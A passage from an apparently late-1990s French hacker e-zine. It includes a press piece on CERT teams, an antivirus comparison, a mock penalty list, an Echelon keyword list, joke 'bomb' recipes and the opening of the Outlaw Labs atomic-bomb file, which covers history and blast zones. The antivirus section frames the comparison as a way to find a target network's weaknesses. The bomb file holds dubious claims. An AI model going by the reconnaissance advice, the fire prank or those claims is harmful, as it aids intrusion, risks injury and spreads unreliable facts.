de l'Internet.
Notre rle n'est pas de dposer plainte ou de donner la chasse aux pirates,
explique David Crochemore, mais d'assister les utilisateurs victimes d'une
attaque. Le Cert, qu'il dirige coordonne les efforts des spcialistes de la
scurit prsents notamment au CEA (Commissariat  l'nergie atomique), au Cnes
(Centre national d'tudes spatiales) et dans les universits. Il diffuse des
alertes, avertit de l'existence de nouveaux virus, fournit des documents sur les
failles de scurit des logiciels. Et, dans l'autre sens, centralise les
informations envoyes par ses correspondants. Un bon moyen pour reprer les
attaques  la mode. Quand un nouvel outil de piratage apparat, tous les
hackers de bas tage se ruent dessus, sourit Crochemore.
Le boulot ne manque pas. Par jeu ou par malveillance, les pirates ne cessent de
prendre d'assaut les machines. Du ct de Renater, David Crochemore avoue cinq
ou six problmes graves (prise de contrle d'un ordinateur) et cinquante 
soixante-dix incidents plus bnins par mois. C'est prs de cinq fois plus qu'il
y a deux ans, dit-il. Mais on ne nous signale pas tout. A Bordeaux, le
responsable de la scurit des universits concde qu'il est victime de deux 
trois tentatives de piratage quotidiennes. Et prcise que ceux qui disent
qu'ils ne sont pas attaqus sont des menteurs.
Urgence. La cration du premier Samu de la scurit informatique remonte 
dcembre 1988,  l'universit de Carnegie Mellon (Pittsburgh),  la demande de
la Darpa, l'agence de recherche et dveloppement du dpartement de la Dfense
amricain. Il y avait urgence: un virus lch par l'tudiant Robert Morris le
mois prcdent venait de paralyser plus de 10 % des ordinateurs connects 
l'Internet. Depuis, c'est l'explosion. En France, une quipe de technopompiers
destine  secourir les administrations et les ministres devrait voir le jour
avant la fin de l'anne. L'organisme sera pilot par le Service central de la
scurit des systmes d'information (SCSSI), aux ordres de Matignon.
Coopration. Au total, la plante compte prs de 80 quipes, fdres au sein du
First (Forum of Incident Response and Security Teams), bas aux Etats-Unis. Cet
organisme est charg d'assurer la coopration des diffrents Cert en cas de
ppin d'ampleur. Ainsi, en mars, quand le virus Melissa a dferl sur
l'Internet, une confrence tlphonique avec plusieurs dizaines de personnes de
toute la plante a eu lieu, raconte David Crochemore. Des Asiatiques, victimes
du dcalage horaire, ont d se relever en pleine nuit pour le briefing. Une
procdure d'urgence, mais encore un peu poussive: lorsque les Cert ont enfin
dlivr le moyen de lutter contre Melissa, le virus avait dj fait le tour de
la plante.
Pompier du Net, un mtier d'avenir? Selon le gnral Jean-Louis Desvignes, le
patron du SCSSI, c'est certain. Presss par une concurrence trs forte, les
diteurs de logiciels ne cessent de sortir de nouvelles versions de leurs
produits, souvent sans prendre le temps de vrifier si des failles de scurit
subsistent. On vous annonce une nouvelle version alors que la prcdente est
encore pleine de bugs, s'agace-t-il. Et l'Internet augmente la vulnrabilit des
ordinateurs. Un bonheur pour les pirates, toujours prts  se faufiler dans le
moindre interstice. Et de nouveaux incendies en prvision.

Antivirus:

   Possder un anti-virus c'est bien, savoir lequel choisir c'est mieux. Les
   antivirus dtectent videmment foule de virus, avec une base de donnes
   remises  jour chaque semaine. Des gens sont pays pour trouver des virus. Le
   plus connu des Anti-Virus est Norton Anti-Virus, mais est-il rellement
   efficace?
Oui il l'est mais dans des proportions non effarantes. Sur 700 fichiers de
scanns Norton n'a trouv que 200 virus sur les 400 mis  disposition. De plus
Norton scann tout ce qui est cracker (multiicq par exemple), ou bien des
programmes comme la partie client de BO2K qui, jusqu' nouvel ordre, n'est pas
infect par un trojan. De plus Norton peut vous donner la description de
certains virus/troyans: bien vague... Alors que Norton fait une description de
Netbus 1.7 (serveur) il n'en fait pas pour la 2.0: quand on sait que la deuxime
est la plus dangereuse...

Si je devais vous conseiller un Anti-Virus je devrais vous conseiller AVP (Anti
Viral Toolkit pro), il dtecte 20% de plus de virus (sans rajouter n'importe
quoi) que NAV.

Sinon voici un comparatif d'antivirus:

SYMANTEC NORTON ANTIVIRUS FOR FIREWALLS
* Recherche les virus sur le: HTTP, SMTP, FTP.
* Ne recherche pas de magouilles sur les Applets
* Ne fait recherche les certificats (intressant)
* Ne recherche pas de signatures (intressant)
* Ne recherche pas les sources (intressant)
* Ne filtre pas les E-mails (intressant)
* Ne fait pas de gestionnaire de dlivrance de courrier
* Pas d'OPSEC Compliant (NT)
* Pas d'OPSEC Compliant (UNIX)
* Ne fait pas de filtrage d'adresses url (intressant)
* Ne fait pas de filtrage de spamming (haha!)
* Il ne bloque pas les cookies (intressant)
* Les algorithmes de compression supports: ARJ, ZIP
* Ne dtecte pas l'e-mail spoofing (intressant)
TREND INTERSCAN VIRUS WALL
* Recherche les virus sur le: HTTP, SMTP, FTP.
* Recherche les magouilles sur les Applets
* Recherche les certificats
* Recherche de signatures
* Recherche pas les sources
* Filtre les E-mails
* Fait un gestionnaire de dlivrance de courrier
* OPSEC Compliant (NT)
* OPSEC Compliant (UNIX)
* Ne fait pas de filtrage d'adresses url
* Fait du filtrage de spamming
* Il ne bloque pas les cookies
* Les algorithmes de compression supports: 19 types
* Ne dtecte pas l'e-mail spoofing

Ainsi on peut voir que TREND INTERSCAN VIRUS WALL est trs fiable (plus que
NORTON). Mais si cette liste est l c'est pour une raison: les rseaux utilisent
toujours ces deux l (en gnral, attention!), pour se scuriser. Donc il est
possible d'tudier ce que fait et ne fait pas chacun de ces utilitaires, pour
mieux se renseigner sur la cible! Un rseau n'utilisant que NORTON, ne sera pas
assez scuris et prsentera donc des failles (pas de filtrages mails par
exemple).

Conclusion:

Ton exploit ! / Tu as gagn Tu as accd  un systme, tu n'y as rien dtruit.
T'es un seigneur. un emprisonnement de deux mois  un an et une amende de 2.000
Frs  50.000 Frs ou l'une de ces deux peines
Tu as en plus modifi des infos ! Top bravo ! l'emprisonnement sera de deux mois
 deux ans et l'amende de 10.000 Frs  100.000 Frs
Tu as niqu le systme. Ce fainant d'admin va avoir du boulot pour 3 jours.
T'es un Lordz ! un emprisonnement de trois mois  trois ans et une amende de
10.000 Frs  100.00 Frs ou l'une de ces deux peines
Tu y as laiss un bon gros trojan ! Encore mieux. un emprisonnement de trois
mois  trois ans et une amende de 2.000 Frs  500.000 Frs ou une de ces deux
peines
Et en partant, tu as chang les mots de passe ! Super cool ! un emprisonnement
d'un an  cinq ans et une amende de 20.000 Frs  2.000.000 Frs
Tu es revenu en utilisant ces mots de passe changs. T'es un malin, toi ! un
emprisonnement d'un an  cinq ans et une amende de 20.000 Frs  2.000.000 Frs ou
une de ces deux peines
Pas de chance, tu as essay de pntrer dans le systme, mais a n'a pas march.
Tu as quand mme droit  un lot de consolation. La mme chose que si tu avais
russi ! Au grand jeu du hacking on gagne  tous les coups !
Tu fais partie d'un groupe de rebelz, tu n'as pas hack, mais tu en as discut
avec tes potes rebelz. Allez, on va dire que tu as aussi gagn On t'offre les
peines prvues pour l'infraction elle-mme ou pour l'infraction la plus
svrement rprime!
profites-en ! Petit veinard ! (Zipiz RuL3z!)

Auteur de l'article (c'est plus un article, c'est un zine l!!): Clad Strife /
clad_strife@hotmail.com
Greetz to: Tobozo, Jc Zic, Aiki, H, Jericho, Kevin Poulsen, Linus pis tous les
lamahs qu'on oublie passke si on met tlm demain le zine prend 40 ko de +.
RE-Greetz: IGA, QHA, SSS, EdenWorld, Pyrofreak, HKC

clad_strife@hotmail.com

`,,`,,`,,``,,`,,`,







           _        _______________________________________        _
-*5*-       `^*;:,.> Les Mot-cles Echelon -by Privassis- <.,:;*^`
___________________/\_____________________

A mettre sur votre page web (meta keyword), dans votre fichier signature, a dire
au telephone, a garder par devers soi. A savoir que la simple lecture de quelques
uns de ces mots declenche l'enregistrement systematique d'une entree sur leurs
serveurs de surveillance globale. N'en abusez pas trop c'est l'argent du
contribuable...

'INFOSEC', 'Information Security', 'Information Warfare', 'IW', 'IS', 'Privacy', 
'Information Terrorism', 'Terrorism Defensive Information', 'Defense Information 
Warfare', 'Offensive Information', 'Offensive Information Warfare', 'National 
Information Infrastructure', 'InfoSec', 'Reno', 'Compsec', 'Computer Terrorism', 
'Firewalls', 'Secure Internet Connections', 'ISS', 'Passwords', 'DefCon V', 
'Hackers', 'Encryption', 'Espionage', 'USDOJ', 'NSA', 'CIA', 'S/Key', 'SSL', 
'FBI', 'Secert Service', 'USSS', 'Defcon', 'Military', 'White House', 
'Undercover', 'NCCS', 'Mayfly', 'PGP', 'PEM', 'RSA', 'Perl-RSA', 'MSNBC', 'bet', 
'AOL', 'AOL TOS', 'CIS', 'CBOT', 'AIMSX', 'STARLAN', '3B2', 'BITNET', 'COSMOS', 
'DATTA', 'E911', 'FCIC', 'HTCIA', 'IACIS', 'UT/RUS', 'JANET', 'JICC', 'ReMOB', 
'LEETAC', 'UTU', 'VNET', 'BRLO', 'BZ', 'CANSLO', 'CBNRC', 'CIDA', 'JAVA', 
'Active X', 'Compsec 97', 'LLC', 'DERA', 'Mavricks', 'Meta-hackers', '^?', 
'Steve Case', 'Tools', 'Telex', 'Military Intelligence', 'Scully', 'Flame', 
'Infowar', 'Bubba', 'Freeh', 'Archives', 'Sundevil', 'jack', 'Investigation', 
'ISACA', 'NCSA', 'spook words', 'Verisign', 'Secure', 'ASIO', 'Lebed', 'ICE', 
'NRO', 'Lexis-Nexis', 'NSCT', 'SCIF', 'FLiR', 'Lacrosse', 'Flashbangs', 'HRT', 
'DIA', 'USCOI', 'CID', 'BOP', 'FINCEN', 'FLETC', 'NIJ', 'ACC', 'AFSPC', 'BMDO', 
'NAVWAN', 'NRL', 'RL', 'NAVWCWPNS', 'NSWC', 'USAFA', 'AHPCRC', 'ARPA', 'LABLINK', 
'USACIL', 'USCG', 'NRC', '~', 'CDC', 'DOE', 'FMS', 'HPCC', 'NTIS', 'SEL', 
'USCODE', 'CISE', 'SIRC', 'CIM', 'ISN', 'DJC', 'SGC', 'UNCPCJ', 'CFC', 'DREO', 
'CDA', 'DRA', 'SHAPE', 'SACLANT', 'BECCA', 'DCJFTF', 'HALO', 'HAHO', 'FKS', '868', 
'GCHQ', 'DITSA', 'SORT', 'AMEMB', 'NSG', 'HIC', 'EDI', 'SAS', 'SBS', 'UDT', 'GOE', 
'DOE', 'GEO', 'Masuda', 'Forte', 'AT', 'GIGN', 'Exon Shell', 'CQB', 'CONUS', 'CTU', 
'RCMP', 'GRU', 'SASR', 'GSG-9', '22nd SAS', 'GEOS', 'EADA', 'BBE', 'STEP', 
'Echelon', 'Dictionary', 'MD2', 'MD4', 'MDA', 'MYK', '747,777', '767', 'MI5', 
'737', 'MI6', '757', 'Kh-11', 'Shayet-13', 'SADMS', 'Spetznaz', 'Recce', '707', 
'CIO', 'NOCS', 'Halcon', 'Duress', 'RAID', 'Psyops', 'grom', 'D-11', 'SERT', 
'VIP', 'ARC', 'S.E.T. Team', 'MP5k', 'DREC', 'DEVGRP', 'DF', 'DSD', 'FDM', 'GRU', 
'LRTS', 'SIGDEV', 'NACSI', 'PSAC', 'PTT', 'RFI', 'SIGDASYS', 'TDM. SUKLO', 
'SUSLO', 'TELINT', 'TEXTA. ELF', 'LF', 'MF', 'VHF', 'UHF', 'SHF', 'SASP', 'WANK', 
'Colonel', 'domestic disruption', 'smuggle', '15kg', 'nitrate', 'Pretoria', 
'M-14', 'enigma', 'Bletchley Park', 'Clandestine', 'nkvd', 'argus', 'afsatcom', 
'CQB', 'NVD', 'Counter Terrorism Security', 'Rapid Reaction', 'Corporate Security', 
'Police', 'sniper', 'PPS', 'ASIS', 'ASLET', 'TSCM', 'Security Consulting', 
'High Security', 'Security Evaluation', 'Electronic Surveillance', 'MI-17', 
'Counterterrorism', 'spies', 'eavesdropping', 'debugging', 'interception', 
'COCOT', 'rhost', 'rhosts', 'SETA', 'Amherst', 'Broadside', 'Capricorn', 
'Gamma', 'Gorizont', 'Guppy', 'Ionosphere', 'Mole', 'Keyhole', 'Kilderkin', 
'Artichoke', 'Badger', 'Cornflower', 'Daisy', 'Egret', 'Iris', 'Hollyhock', 
'Jasmine', 'Juile', 'Vinnell', 'B.D.M.,Sphinx', 'Stephanie', 'Reflection', 
'Spoke', 'Talent', 'Trump', 'FX', 'FXR', 'IMF', 'POCSAG', 'Covert Video', 
'Intiso', 'r00t', 'lock picking', 'Beyond Hope', 'csystems', 'passwd', '2600 
Magazine', 'Competitor', 'EO', 'Chan', 'Alouette,executive', 'Event Security', 
'Mace', 'Cap-Stun', 'stakeout', 'ninja', 'ASIS', 'ISA', 'EOD', 'Oscor', 'Merlin', 
'NTT', 'SL-1', 'Rolm', 'TIE', 'Tie-fighter', 'PBX', 'SLI', 'NTT', 'MSCJ', 'MIT', 
'69', 'RIT', 'Time', 'MSEE', 'Cable & Wireless', 'CSE', 'Embassy', 'ETA', 'Porno', 
'Fax', 'finks', 'Fax encryption', 'white noise', 'pink noise', 'CRA', 'M.P.R.I.', 
'top secret', 'Mossberg', '50BMG', 'Macintosh Security', 'Macintosh Internet 
Security', 'Macintosh Firewalls', 'Unix Security', 'VIP Protection', 'SIG', 
'sweep', 'Medco', 'TRD', 'TDR', 'sweeping', 'TELINT', 'Audiotel', 'Harvard', 
'1080H', 'SWS', 'Asset', 'Satellite imagery', 'force', 'Cypherpunks', 'Coderpunks', 
'TRW', 'remailers', 'replay', 'redheads', 'RX-7', 'explicit', 'FLAME', 
'Pornstars', 'AVN', 'Playboy', 'Anonymous', 'Sex', 'chaining', 'codes', 
'Nuclear', '20', 'subversives', 'SLIP', 'toad', 'fish', 'data havens', 'unix', 
'c', 'a', 'b', 'd', 'the', 'Elvis', 'quiche', 'DES', '1*', 'NATIA', 'NATOA', 
'sneakers', 'counterintelligence', 'industrial espionage', 'PI', 'TSCI', 
'industrial intelligence', 'H.N.P.', 'Juiliett Class Submarine', 'Locks', 'loch', 
'Ingram Mac-10', 'sigvoice', 'ssa', 'E.O.D.', 'SEMTEX', 'penrep', 'racal', 'OTP', 
'OSS', 'Blowpipe', 'CCS', 'GSA', 'Kilo Class', 'squib', 'primacord', 'RSP', 
'Becker', 'Nerd', 'fangs', 'Austin', 'Comirex', 'GPMG', 'Speakeasy', 'humint', 
'GEODSS', 'SORO', 'M5', 'ANC', 'zone', 'SBI', 'DSS', 'S.A.I.C.', 'Minox',
'Keyhole', 'SAR', 'Rand Corporation', 'Wackenhutt', 'EO', 'Wackendude', 'mol', 
'Hillal', 'GGL', 'CTU', 'botux', 'Virii', 'CCC', 'Blacklisted 411', 'Internet 
Underground', 'XS4ALL', 'Retinal Fetish', 'Fetish', 'Yobie', 'CTP', 'CATO', 
'Phon-e', 'Chicago Posse', 'l0ck', 'spook keywords', 'PLA', 'TDYC', 'W3', 'CUD', 
'CdC', 'Weekly World News', 'Zen', 'World Domination', 'Dead', 'GRU', 'M72750', 
'Salsa', '7', 'Blowfish', 'Gorelick', 'Glock', 'Ft. Meade', 'press-release', 
'Indigo', 'wire transfer', 'e-cash', 'Digicash', 'zip', 'SWAT', 'Ned 
Rubenschlachen Ortega', 'PPP', 'crypto-anarchy', 'AT&T', 'SGI', 'SUN', 'MCI', 
'Blacknet', 'Middleman', 'KLM', 'Blackbird', 'plutonium', 'Texas', 'jihad', 
'SDI', 'Uzi', 'Fort Meade', 'supercomputer', 'bullion', '3', 'Blackmednet', 
'Propaganda', 'ABC', 'Satellite phones', 'Planet-1', 'cryptanalysis', 'nuclear', 
'FBI', 'Panama', 'fissionable', 'Sears Tower', 'NORAD', 'Delta Force', 'SEAL', 
'virtual', 'Dolch', 'secure shell', 'screws', 'Black-Ops', 'Area51', 'SABC', 
'basement', 'data-haven', 'black-bag', 'TEMPSET', 'Goodwin', 'rebels', 'ID', 
'MD5', 'IDEA', 'garbage', 'market', 'beef', 'Stego', 'unclassified', 'utopia', 
'orthodox', 'Alica', 'SHA', 'Global', 'gorilla', 'Bob', 'Pseudonyms', 'MITM', 
'Gray Data', 'VLSI', 'mega', 'Leitrim', 'Yakima', 'Sugar Grove', 'Cowboy', 
'Gist', '8182', 'Gatt', 'Platform', '1911', 'Geraldton', 'UKUSA', 'veggie', 
'3848', 'Morwenstow', 'Consul', 'Oratory', 'Pine Gap', 'Menwith', 'Mantis', 
'DSD', 'BVD', '1984', 'Flintlock', 'cybercash', 'government', 'hate', 
'speedbump', 'illuminati', 'president', 'freedom', 'cocaine', '$', 'Roswell', 
'ESN', 'COS', 'E.T.', 'credit card', 'b9', 'fraud', 'assasinate', 'virus', 
'anarchy', 'rogue', 'mailbomb', '888', 'Chelsea', '1997', 'Whitewater', 'MOD', 
'York', 'plutonium', 'William Gates', 'clone', 'BATF', 'SGDN', 'Nike', 'Atlas', 
'Delta', 'TWA', 'Kiwi', 'PGP 2.6.2.', 'PGP 5.0i', 'PGP 5.1', 'siliconpimp', 
'Lynch', '414', 'Face', 'Pixar', 'IRIDF', 'eternity server', 'Skytel', 'Yukon', 
'Templeton', 'LUK', 'Cohiba', 'Soros', 'Standford', 'niche', '51', 'H&K', 'USP',
'^', 'sardine', 'bank', 'EUB', 'USP', 'PCS', 'NRO', 'Red Cell', 'Glock 26', 
'snuffle', 'Patel', 'package', 'ISI', 'INR', 'INS', 'IRS', 'GRU', 'RUOP', 'GSS', 
'NSP', 'SRI', 'Ronco', 'Armani', 'BOSS', 'Chobetsu', 'FBIS', 'BND', 'SISDE', 
'FSB', 'BfV', 'IB', 'froglegs', 'JITEM', 'SADF', 'advise', 'TUSA', 'HoHoCon', 
'SISMI', 'FIS', 'MSW', 'Spyderco', 'UOP', 'SSCI', 'NIMA', 'MOIS', 'SVR', 'SIN', 
'advisors', 'SAP', 'OAU', 'PFS', 'Aladdin', 'chameleon man', 'Hutsul', 'CESID', 
'Bess', 'rail gun', 'Peering', '17', '312', 'NB', 'CBM', 'CTP', 'Sardine', 
'SBIRS', 'SGDN', 'ADIU', 'DEADBEEF', 'IDP', 'IDF', 'Halibut', 'SONANGOL', 
'Flu', '&', 'Loin', 'PGP 5.53', 'EG&G', 'AIEWS', 'AMW', 'WORM', 'MP5K-SD', 
'1071', 'WINGS', 'cdi', 'DynCorp', 'UXO', 'Ti', 'THAAD', 'package', 'chosen', 
'PRIME', 'SURVIAC'

P.

`,,`,,`,,``,,`,,`,


           _        _______________________________________        _
-*6*-       `^*;:,.> Ambiance 14 Juillet (RDV Universel) <.,:;*^`
___________________/\_____________________

On souligne ici l'evidence que tout ce qui suit est ecrit sur le ton de la 
rigolade ou alors a but educatif.
Maintenant si vous etes assez con pour mettre ca en application, c'est que meme la
medecine ne peut plus rien pour vous... On a rassemble ici un petit medley des 
reactions qui nous sont parvenues suite a un deplorable evenement survenu dans 
un pays neutre.





***********************************************************
La bombe humaine
----------------
Pour realiser cette experience vous avez besoin de : 
-Un extincteur (au cas ou...)
-Une boite d'allumettes (un briquet peut faire l'affaire)
-Un bon canap
-Un pantalon en jeans 
-Une boite de 250g (minimum) de fayots premier choix

Mode d'emploi : 
-Bouffez les fayots et attendez que la digestion se fasse.
-Quand vous sentez la pression, retenez vous 4h sans RIEN
laisser echapper. 
-Placez l'extincteur a proximite du canap (a portee de
main).
-Asseyez vous sur le canap en prenant garde a bien orienter
le flux gazeux vers le haut.
-Allumez le briquet et positionnez le a 2 centimetres environs
de l'orifice de sortie.
-A la maniere d'une parturiante, respirez, respirez, POUSSEZ !!!
-Admirez le joli feu d'artifice

Note : L'hydrogene sulfureux est un gaz inflammable fabriqu
par notre corps. Certaines personnes (que je ne nommerai pas)
ont tendance a etre tres "dvelopps" de ce cot-la et ont
donc une tendance a en produire une quantit plus importante
que la moyenne. A ceux la je dis : Faites gaffe aux retours 
de flammes. 
Dans un prochain article, nous discuterons sur les moyens 
d'identifier le regime alimentaire en se basant sur les
couleurs du spectre produit par la flamme.

Bonne digestion

Peteur Pan






***********************************************************
Exploit 2.2.35 : Explosif !
---------------------------

"A un esprit Anarchiste sans vergogne comme le mien
convient cette invention legentaire, s'il en est" - Leonardo DaVinci.

Aujourd'hui, la marmotte rebelle met en danger le territoire francais
en fournissant les plans de la bombe a eau.

        --- Ceci n'est pas du spam ! ---
        Alcimiste, si tu reussis a endomager une ame
        en appliquant ce parchemin,
        tu auras droit a un champi gratos :)
                            
Lamentable, de nos jours, les djeun's ne savent meme plus plier le papier !
Leonard a encore frappe, apres la char, il a invente l'Arme Destructrice.
3 techniques.


Recette a l'Uranium
-------------------
Vous habitez au dessus d'une rue passante.
Les caisses klaxonnent a 5 H du mat, heure a laquelle
vous essayez justement de vous endormir.

Vous allez remedier a ce probleme.

   Ingredients:
        * 500 Kg de potassium
        * 10 tonnes de chlorate de soude
        * 2 Kg d'Uranium enrichit
        * 1 bombe atomique

La bombe atomique est optionnelle, c'est juste pour le detonnateur.

Vous gonlfez le ballon en plastique (comme ceux que l'on utilise pour
les fetes ringardes) au robinet de la cuisine. Faites un noeud.
Approchez vous de la fenetre, visez, et lachez. Si vous etes au dernier
etage, c'est l'ideal !
Le choc risque de laisser pantois le conducteur, et les caisses alentour.


Encore plus fort !
------------------

Voyons .. les cocottes en papier, c trop petit ...
La technique est alors la suivante : une corde bien tendue formant
une pente assez importante, dont le point le plus bas est situe
strategiquement a un endroit ou le passage est oblige,
du haut de laquelle on fait glisser un sac poubelle de capacite
superieure a 50 Litres rempli d'eau .. ca s'appelle le progres .. [SW].


La Methode du Chat Echaude (qui craint l'eau froide)
----------------------------------------------------
Utilisez l'eau chaude du robinet ;>


                                                 -- La Marmotte Rebelle





***********************************************************
Dans le delire plus serieux, voici le plan de la bombe A (pouvez
toujours courir pour trouver de l'uranium ou du plutonium hehehe).
Afin d'eviter de rentrer en conflit avec les auteurs, ce texte est 
livr "aziz" sans aucune modif ni ajout. Notez au passage le petit cours
sur la fission de l'atome, tres interessant et tres instructif.
--------------------------------
  File courtesy of Outlaw Labs
--------------------------------
 ============================================================================
               -------------------------------------------------
               - Documentation and Diagrams of the Atomic Bomb -
               -------------------------------------------------
 ============================================================================
   ______________
  /              \
 <-} DISCLAIMER {->
  \______________/

     The  information  contained  in  this file  is strictly for  academic use
alone.   Outlaw Labs will bear  no responsibility  for any use otherwise.   It
would be  wise  to note that the  personnel  who  design  and construct  these
devices are  skilled physicists  and are  more knowledgeable  in these matters
than  any  layperson  can ever hope to be...   Should  a layperson  attempt to
build a device such as this,  chances are s/he would probably kill his/herself
not by a nuclear detonation,  but rather through radiation exposure.   We here
at Outlaw Labs do not recommend using  this file beyond the realm of casual or
academic curiosity.


 ============================================================================

                            -----------------------
                            -+ Table of Contents +-
                            -----------------------


     I.  The History of the Atomic Bomb
         ------------------------------
         A).  Development  (The Manhattan Project)
         B).  Detonation
              1). Hiroshima
              2). Nagasaki
              3). Byproducts of atomic detonations
              4). Blast Zones


    II.  Nuclear Fission/Nuclear Fusion
         ------------------------------
         A).  Fission (A-Bomb) & Fusion (H-Bomb)
         B).  U-235, U-238 and Plutonium


   III.  The Mechanism of The Bomb
         -------------------------
         A).  Altimeter
         B).  Air Pressure Detonator
         C).  Detonating Head(s)
         D).  Explosive Charge(s)
         E).  Neutron Deflector
         F).  Uranium & Plutonium
         G).  Lead Shield
         H).  Fuses


    IV.  The Diagram of The Bomb
         -----------------------
         A).  The Uranium Bomb
         B).  The Plutonium Bomb




 ============================================================================
 
--------------------------------
  File courtesy of Outlaw Labs
--------------------------------



   I.  The History of the Atomic Bomb
       ------------------------------

       On August 2nd 1939, just before the beginning of World War II, Albert
Einstein wrote to then President Franklin D. Roosevelt.  Einstein and several
other scientists told Roosevelt of efforts in Nazi Germany to purify U-235
with which might in turn be used to build an atomic bomb.  It was shortly
thereafter that the United States Government began the serious undertaking
known only then as the Manhattan Project.  Simply put, the Manhattan Project
was committed to expedient research and production that would produce a viable
atomic bomb.

     The most complicated issue to be addressed was the production of ample
amounts of `enriched' uranium to sustain a chain reaction.  At the time,
Uranium-235 was very hard to extract.  In fact, the ratio of conversion from
Uranium ore to Uranium metal is 500:1.  An additional drawback is that the 1
part of Uranium that is finally refined from the ore consists of over 99%
Uranium-238, which is practically useless for an atomic bomb.  To make it even
more difficult, U-235 and U-238 are precisely similar in their chemical
makeup.  This proved to be as much of a challenge as separating a solution of
sucrose from a solution of glucose.  No ordinary chemical extraction could
separate the two isotopes.  Only mechanical methods could effectively separate
U-235 from U-238.  Several scientists at Columbia University managed to solve
this dilemma.

     A massive enrichment laboratory/plant was constructed at Oak Ridge,
Tennessee.  H.C. Urey, along with his associates and colleagues at Columbia
University, devised a system that worked on the principle of gaseous
diffusion.  Following this process, Ernest O.  Lawrence (inventor of the
Cyclotron) at the University of California in Berkeley implemented a process
involving magnetic separation of the two isotopes.

     Following the first two processes, a gas centrifuge was used to further
separate the lighter U-235 from the heavier non-fissionable U-238 by their
mass.  Once all of these procedures had been completed, all that needed to be
done was to put to the test the entire concept behind atomic fission.  [For
more information on these procedures of refining Uranium, see Section 3.]

     Over the course of six years, ranging from 1939 to 1945, more than 2
billion dollars were spent on the Manhattan Project.  The formulas for
refining Uranium and putting together a working bomb were created and seen to
their logical ends by some of the greatest minds of our time.  Among these
people who unleashed the power of the atomic bomb was J. Robert Oppenheimer.

     Oppenheimer was the major force behind the Manhattan Project.  He
literally ran the show and saw to it that all of the great minds working on
this project made their brainstorms work.  He oversaw the entire project from
its conception to its completion.

     Finally the day came when all at Los Alamos would find out whether or not
The Gadget (code-named as such during its development) was either going to be
the colossal dud of the century or perhaps end the war.  It all came down to
a fateful morning of midsummer, 1945.

     At 5:29:45 (Mountain War Time) on July 16th, 1945, in a white blaze that
stretched from the basin of the Jemez Mountains in northern New Mexico to the
still-dark skies, The Gadget ushered in the Atomic Age.  The light of the
explosion then turned orange as the atomic fireball began shooting upwards at
360 feet per second, reddening and pulsing as it cooled. The characteristic
mushroom cloud of radioactive vapor materialized at 30,000 feet.  Beneath the
cloud, all that remained of the soil at the blast site were fragments of jade
green radioactive glass.  ...All of this caused by the heat of the reaction.

     The brilliant light from the detonation pierced the early morning skies
with such intensity that residents from a faraway neighboring community would
swear that the sun came up twice that day.  Even more astonishing is that a
blind girl saw the flash 120 miles away.

     Upon witnessing the explosion, reactions among the people who created
it were mixed.  Isidor Rabi felt that the equilibrium in nature had been
upset -- as if humankind had become a threat to the world it inhabited.
J. Robert Oppenheimer, though ecstatic about the success of the project,
quoted a remembered fragment from Bhagavad Gita.  "I am become Death," he
said, "the destroyer of worlds."  Ken Bainbridge, the test director, told
Oppenheimer, "Now we're all sons of bitches."

     Several participants, shortly after viewing the results, signed petitions
against loosing the monster they had created, but their protests fell on deaf
ears.  As it later turned out, the Jornada del Muerto of New Mexico was not
the last site on planet Earth to experience an atomic explosion.

     As many know, atomic bombs have been used only twice in warfare.  The
first and foremost blast site of the atomic bomb is Hiroshima.  A Uranium
bomb (which weighed in at over 4 & 1/2 tons) nicknamed "Little Boy" was
dropped on Hiroshima August 6th, 1945.  The Aioi Bridge, one of 81 bridges
connecting the seven-branched delta of the Ota River, was the aiming point of
the bomb.  Ground Zero was set at 1,980 feet.  At 0815 hours, the bomb was
dropped from the Enola Gay.  It missed by only 800 feet.  At 0816 hours, in
the flash of an instant, 66,000 people were killed and 69,000 people were
injured by a 10 kiloton atomic explosion.

     The point of total vaporization from the blast measured one half of a
mile in diameter.  Total destruction ranged at one mile in diameter.  Severe
blast damage carried as far as two miles in diameter.  At two and a half
miles, everything flammable in the area burned.  The remaining area of the
blast zone was riddled with serious blazes that stretched out to the final
edge at a little over three miles in diameter.  [See diagram below for blast
ranges from the atomic blast.]

     On August 9th 1945, Nagasaki fell to the same treatment as Hiroshima.
Only this time, a Plutonium bomb nicknamed "Fat Man" was dropped on the city.
Even though the "Fat Man" missed by over a mile and a half, it still leveled
nearly half the city.  Nagasaki's population dropped in one split-second from
422,000 to 383,000.  39,000 were killed, over 25,000 were injured.  That
blast was less than 10 kilotons as well.  Estimates from physicists who have
studied each atomic explosion state that the bombs that were used had utilized
only 1/10th of 1 percent of their respective explosive capabilities.

     While the mere explosion from an atomic bomb is deadly enough, its
destructive ability doesn't stop there.  Atomic fallout creates another hazard
as well.  The rain that follows any atomic detonation is laden with
radioactive particles.  Many survivors of the Hiroshima and Nagasaki blasts
succumbed to radiation poisoning due to this occurance.

     The atomic detonation also has the hidden lethal surprise of affecting
the future generations of those who live through it.  Leukemia is among the
greatest of afflictions that are passed on to the offspring of survivors.

     While the main purpose behind the atomic bomb is obvious, there are many
by-products that have been brought into consideration in the use of all
weapons atomic.  With one small atomic bomb, a massive area's communications,
travel and machinery will grind to a dead halt due to the EMP (Electro-
Magnetic Pulse) that is radiated from a high-altitude atomic detonation.
These high-level detonations are hardly lethal, yet they deliver a serious
enough EMP to scramble any and all things electronic ranging from copper wires
all the way up to a computer's CPU within a 50 mile radius.

     At one time, during the early days of The Atomic Age, it was a popular
notion that one day atomic bombs would one day be used in mining operations
and perhaps aid in the construction of another Panama Canal.  Needless to say,
it never came about.  Instead, the military applications of atomic destruction
increased.  Atomic tests off of the Bikini Atoll and several other sites were
common up until the Nuclear Test Ban Treaty was introduced.  Photos of nuclear
test sites here in the United States can be obtained through the Freedom of
Information Act.

 ============================================================================

                - Breakdown of the Atomic Bomb's Blast Zones -
                ----------------------------------------------


                                       .
                         .                           .


              .                        .                        .
                             .                   .
               [5]                    [4]                    [5]
                                       .
                      .        .               .        .

       .                  .                         .                  .

                 .          [3]        _        [3]          .
                      .           .   [2]   .           .
                                .     _._     .
                               .    .~   ~.    .
    .          . [4] .         .[2].  [1]  .[2].         . [4] .          .
                               .    .     .    .
                                .    ~-.-~    .
                      .           .   [2]   .           .
                 .          [3]        -        [3]          .

       .                  .                         .                  .

                      .        ~               ~        .
                                       ~
               [5]           .        [4]        .           [5]
                                       .
              .                                                 .


                         .                           .
                                       .


 ============================================================================

                              - Diagram Outline -
                             ---------------------


     [1]  Vaporization Point
          ------------------
          Everything is vaporized by the atomic blast.  98% fatalities.
          Overpress=25 psi.  Wind velocity=320 mph.

     [2]  Total Destruction
          -----------------
          All structures above ground are destroyed.  90% fatalities.
